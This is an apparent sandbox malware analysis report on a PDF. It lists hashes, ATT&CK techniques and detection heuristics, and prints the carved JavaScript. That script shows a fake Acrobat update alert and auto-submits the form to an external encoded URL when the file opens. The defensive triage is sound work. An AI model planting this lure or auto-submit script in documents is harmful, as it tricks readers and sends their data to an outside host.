Malicious PDF — malware analysis report

Static analysis result for SHA-256 d6d37320290c359f…

MALICIOUS

PDF

107.3 KB Created: 2018-06-12 09:41:10 -04:00 First seen: 2021-09-27
MD5: 13cb3a7b04aff81783577304cb661e40 SHA-1: accd2c6951d3b6c5c427c5ce849be92014dfb6b9 SHA-256: d6d37320290c359f10b782ba66b1dc0d02702a21e5b428465044c5ba49fabace
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The PDF contains JavaScript that triggers a fake Adobe Acrobat update prompt, aiming to deceive the user into clicking 'OK'. Upon user interaction, the script executes `app.doc.submitForm` to send data to a remote URL, likely initiating a download or further compromise. The presence of JavaScript and the fake update lure strongly indicate a malicious intent to exploit user trust for execution.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9477

Heuristics 8

  • PDF auto-runs JavaScript form submission on open critical PDF_OPENACTION_JS_SUBMITFORM
    PDF uses /OpenAction to run JavaScript that calls submitForm() with an external HTTP(S) URL. Opening the document triggers the outbound submission path without requiring a normal link click.
  • PDF JavaScript shows fake Acrobat updater prompt high PDF_FAKE_ACROBAT_UPDATE_LURE
    PDF JavaScript displays Acrobat/update-themed language such as a document rendering engine update or remote connection to Adobe servers. When paired with JavaScript or external submission, this is a social-engineering lure rather than benign document text.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • External URI info PDF_URI
    PDF contains an external URL action
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://mail.kb4.io/XT1RKdFIzZFpUVU5PTVZsTk5rZERZbE5ETjB3dmVXWjVka0pwVDNoTE1FSnFVVEppTWxsa2VuZHZlSHBpWVhkeGRHNW9NbVJ4VGtRMlluTk1ka2R0U2tSQ1kweHdiVFl3SzFocVlscDBkR0YxU0hSbWIycGtOakJpYVc5UmNreGxkek5pZGxwc1UzQllaRGc5TFMxcE9EQm1jVFY2ZVdndmNITm5TMjlDTTNSM2NHeEJQVDA9LS01MzVhNDY1MmJkNjBhMDg3ODdmNzAxYmU1ZjA1YjllNjA4ZmYzZmJh?cid=952433194#FDF Referenced by PDF JavaScript
    • https://mail.kb4.io/XTmtRd1QyeEdiSGxJU2tsbk9FRmhWMlZpTkhrNUwwTkRRVE5tWVdsaVRqaFRMMHd6ZWxjcldtNW9URkpRVnpoV01XZDFaVUp1U0ZZNFJHVlZlbVpUTVcxSFYyUXJWalo1YVVvNGRWSktOMFJOVGtoVFlsWm1aRE56TDJaWU5DdDRTSFJPY2xCMk1uZG5PRFJwVG1ad2EySnFSa3MyYm1oRldFRklZMWhyY1U0M1JWaFBhMUY2WTAxUmMzUkpiSGR0Y2t0aFRYZFphMEZXVFUxbGNHTk1la1I2ZDNocGMwMTViRXRaUFMwdE0yRTNUR1pvY21JcldqZFBNMnhrYldvMU1GRlhRVDA5LS0wZGM4ZDI0ZGMwYjJkMDM5ODNiOWQ5NjE0MWM4YzgyMDRkZDdlY2Q0?cid=952433194Referenced by PDF JavaScript
    • https://mail.kb4.io/XT0dGRFoyWlhRbnAyVFhKM2EyNUxaVEl3U1ZRNVMxbFVkMlpDVFU5bmIzUlBaV3B2WVcxQlFXOVZVRmx3ZEZKclZVTlJTSEZ2UWxGcGFubDFhR0ZhTjJveFJVaG1XakpuVlUxQlNtTlBkWG81YTFKS2RrRTVSblUyUkRsNWNXMDNjVlUwVURKNGQxTTBla2x0YlVKV1lqWktSazUzVmtaT05XVktOWGRzU1RWRGNEZ3llbHAxU1dvNWVtcFNNSEZJU0VodVJrUnlZVTVOWVVwWmFVeFphbE52VDFVNVRVZFdTWE5CUFMwdGIyZ3ZSMDRyUzJndmJXMVNXRm94Tmt4VVNrMWhkejA5LS02N2Y3NTdiYjdjOGVhOTFhM2NjNzY4NTZlOTA3NDVhMGJiM2YxN2Nm?cid=952433194Referenced by PDF JavaScript
    • https://mail.kb4.io/XVURGSlFXUlZVR2R5U0VOUU5GZEVaMHBEYzFaaFJrWjRiRGt4ZG1zeWFFWjFRalZsWVVGeVVuZGFRemd4ZVdKSGJuaE5aekpITlVwTWFUTXZXREowY0d4Q2FVVTRRWFUzT0VWeWRFeHhNQzlrWmtsd1VWUlBTV0YyUVZNcmNrVnFhelZKVDFadVpFMUJjRUZuVUVGYVlqVkVkRzQyZEVOeldYSkdSbk0xVXpsSFNqbE9PR1ZyTjI5S2VIaGhURUZQT1ZObU5HWlpPUzluZVhGeGRWRjFSVGMyWjBOTFVsaFJOV05GUFMwdGEzbE9OalZJWlhkTWNFZG1RVGRTWkd4eUsyNU9aejA5LS0zM2FmNjEzNTQ1NmRjZDg4YzA1OTQ2ZWY4NGNhMWUyYzViNzQ4ZDc0?cid=952433194Referenced by PDF JavaScript
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by PDF JavaScript
    • http://ns.adobe.com/xap/1.0/Referenced by PDF JavaScript
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/tiff/1.0/Referenced by PDF JavaScript
    • http://ns.adobe.com/exif/1.0/Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x180A 589 bytes
SHA-256: 6d90361951f783fd26935100c7f6911d329358d27f3f36b1dc8fc4a286e33b38
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function docOpened()
{
app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3});
app.doc.submitForm('https://mail.kb4.io/XT1RKdFIzZFpUVU5PTVZsTk5rZERZbE5ETjB3dmVXWjVka0pwVDNoTE1FSnFVVEppTWxsa2VuZHZlSHBpWVhkeGRHNW9NbVJ4VGtRMlluTk1ka2R0U2tSQ1kweHdiVFl3SzFocVlscDBkR0YxU0hSbWIycGtOakJpYVc5UmNreGxkek5pZGxwc1UzQllaRGc5TFMxcE9EQm1jVFY2ZVdndmNITm5TMjlDTTNSM2NHeEJQVDA9LS01MzVhNDY1MmJkNjBhMDg3ODdmNzAxYmU1ZjA1YjllNjA4ZmYzZmJh?cid=952433194#FDF');
}

docOpened();
javascript_obj0012_001.js pdf-javascript-stream PDF /JS object 12 at offset 0x1831 103678 bytes
SHA-256: eaf2f05df8ca3c6337b9a8de005d8bc324d5fe5c6918272830723c05800fdf20
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 8 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function docOpened()
{
app.alert({cMsg: 'We need to update your document rendering engine. Click OK to continue, when prompted allow remote connection to Adobe servers.', cTitle: 'Adobe Acrobat Updater',nIcon: 3});
app.doc.submitForm('https://mail.kb4.io/XT1RKdFIzZFpUVU5PTVZsTk5rZERZbE5ETjB3dmVXWjVka0pwVDNoTE1FSnFVVEppTWxsa2VuZHZlSHBpWVhkeGRHNW9NbVJ4VGtRMlluTk1ka2R0U2tSQ1kweHdiVFl3SzFocVlscDBkR0YxU0hSbWIycGtOakJpYVc5UmNreGxkek5pZGxwc1UzQllaRGc5TFMxcE9EQm1jVFY2ZVdndmNITm5TMjlDTTNSM2NHeEJQVDA9LS01MzVhNDY1MmJkNjBhMDg3ODdmNzAxYmU1ZjA1YjllNjA4ZmYzZmJh?cid=952433194#FDF');
}

docOpened();
endstream
endobj

%QDF: ignore_newline
13 0 obj
483
endobj

%% Page 1
%% Original object ID: 16 0
14 0 obj
<<
  /Annots 15 0 R
  /Contents 16 0 R
  /CropBox [
    0
    0
    612
    792
  ]
  /MediaBox [
    0
    0
    612
    792
  ]
  /Parent 8 0 R
  /Resources <<
    /Font <<
      /C0_0 18 0 R
      /C0_1 19 0 R
      /C0_2 20 0 R
    >>
    /ProcSet [
      /PDF
      /Text
      /ImageC
    ]
    /XObject <<
      /Im0 21 0 R
      /Im1 23 0 R
      /Im2 25 0 R
    >>
  >>
  /Rotate 0
  /Type /Page
>>
endobj

%% Original object ID: 32 0
15 0 obj
[
  27 0 R
  28 0 R
  29 0 R
]
endobj

%% Contents for page 1
%% Original object ID: 18 0
16 0 obj
<<
  /Length 17 0 R
>>
stream
q
404.8937073 0 0 269.9337463 107.3061676 460.5401001 cm
/Im0 Do
Q
BT
/C0_0 12 Tf
1 0 0.2679 1 116.07 441.387 Tm
<00350049004a005400010045005000440056004e0046004f00550001004a005400010046004f00440053005a0051005500460045000100560054004a004f0048000100220045005000430046000100340046004400560053004600010024004d005000560045>Tj
/C0_1 12 Tf
<00e4>Tj
/C0_0 12 Tf
<000f0001>Tj
4.179 -15.6 Td
<0024004d004a0044004c000100430046004d005000580001005500500001005400460044005600530046004d005a00010057004a00460058000100440050004f00550046004f00550054000f0001>Tj
ET
/TouchUp_TextEdit MP
BT
0 i 
/C0_2 10 Tf
158.323 52.725 Td
<0031004d00460042005400460001004f005000550046001b000100340050004e00460001005800460043004e0042004a004d00010044004d004a0046004f0055005400010042005300460001004f00500055000100440050004e005100420055004a0043004d004600010058004a005500490001002200450050004300460001>Tj
0 -12 TD
<00340046004400560053004600010024004d00500056004500e4000f0001002a004700010055004900420055000100490042005100510046004f0054000d0001004500500058004f004d005000420045000100550049004600010047004a004d004600010042004f00450001005000510046004f00010050004f0001>Tj
T*
<002500460054004c005500500051000f>Tj
ET
q
56.1389923 0 0 43.9851837 94.3450775 23.5263672 cm
/Im1 Do
Q
q
157.0927124 0 0 36.2528992 230.401001 342.7270813 cm
/Im2 Do
Q
endstream
endobj

17 0 obj
1300
endobj

%% Original object ID: 40 0
18 0 obj
<<
  /BaseFont /KUFUSM+HiraKakuProN-W6
  /DescendantFonts 30 0 R
  /Encoding /Identity-H
  /Subtype /Type0
  /ToUnicode 31 0 R
  /Type /Font
>>
endobj

%% Original object ID: 42 0
19 0 obj
<<
  /BaseFont /VGWIQQ+HiraKakuProN-W6
  /DescendantFonts 33 0 R
  /Encoding /Identity-H
  /Subtype /Type0
  /ToUnicode 34 0 R
  /Type /Font
>>
endobj

%% Original object ID: 44 0
20 0 obj
<<
  /BaseFont /JSIEEO+HiraKakuProN-W6
  /DescendantFonts 36 0 R
  /Encoding /Identity-H
  /Subtype /Type0
  /ToUnicode 37 0 R
  /Type /Font
>>
endobj

%% Original object ID: 25 0
21 0 obj
<<
  /BitsPerComponent 8
  /ColorSpace /DeviceRGB
  /Filter /DCTDecode
  /Height 400
  /Metadata 39 0 R
  /Name /X
  /Subtype /Image
  /Type /XObject
  /Width 600
  /Length 22 0 R
>>
stream
����  JFIF          ��  JFIF          �� C                        	 	                            &""&0-0>>T�� C                        	 	                            &""&0-0>>T��    � X  "       ��                            	
 �� �                }        !1A  Qa "q 2��� #B�� R��$3br�	
     %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz���������������������������������������������������������������������������                            	
 �� �                w       !1  AQ aq "2�  B����	#3R� br�
 $4�%�    &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������          ? ��sKL� ^�����h� R� ( Դ�p4 �g Q@  ����(��` 
... (truncated)
font_00_cff_off00019623.bin pdf-font-stream PDF embedded font (cff) at offset 0x19623 4575 bytes
SHA-256: 9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0